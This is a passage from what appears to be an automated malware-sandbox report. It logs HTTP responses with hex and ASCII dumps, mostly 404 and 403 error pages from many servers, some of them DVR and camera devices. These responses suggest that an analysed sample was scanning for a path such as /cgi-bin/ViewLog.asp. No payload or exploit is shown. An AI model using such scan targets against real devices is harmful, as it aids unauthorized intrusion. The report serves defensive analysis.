3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 14 Feb 2024 08:29:01 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:30:06 GMTServer: Apache/2.4.52 (Win64)Content-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:06 GMTServer: xxxxX-Frame-Options: SAMEORIGINLast-Modified: Thu, 11 Oct 2018 07:19:39 GMTETag: "30-577eecb3938c0"Accept-Ranges: bytesContent-Length: 48Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 68 34 3e 20 48 74 74 70 20 45 72 72 6f 72 3a 34 30 34 20 50 61 67 65 20 64 6f 65 73 20 4e 6f 74 20 45 78 69 73 74 73 20 21 20 3c 2f 68 34 3e Data Ascii: <h4> Http Error:404 Page does Not Exists ! </h4>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:24:03 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Wed, 14 Feb 2024 08:29:14 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 37 36 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 11:54:05 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Wed, 14 Feb 2024 08:29:28 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:30:49 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=180, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:38 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 295Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at 192.168.0.14 Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: owsdcontent-type: text/htmlcontent-length: 38Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404</h1></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Wed, 14 Feb 2024 08:29:44 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 14 Feb 2024 08:29:48 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 11:53:07 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 14 Feb 2024 08:29:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:28:38 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 14 Feb 2024 11:32:18 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveETag: "80e8-a9"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4e 56 52 44 56 52 49 50 43 20 57 65 62 20 53 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>NVRDVRIPC Web Server</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 14 Feb 2024 08:30:03 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Wed, 14 Feb 2024 08:30:32 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 37 36 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 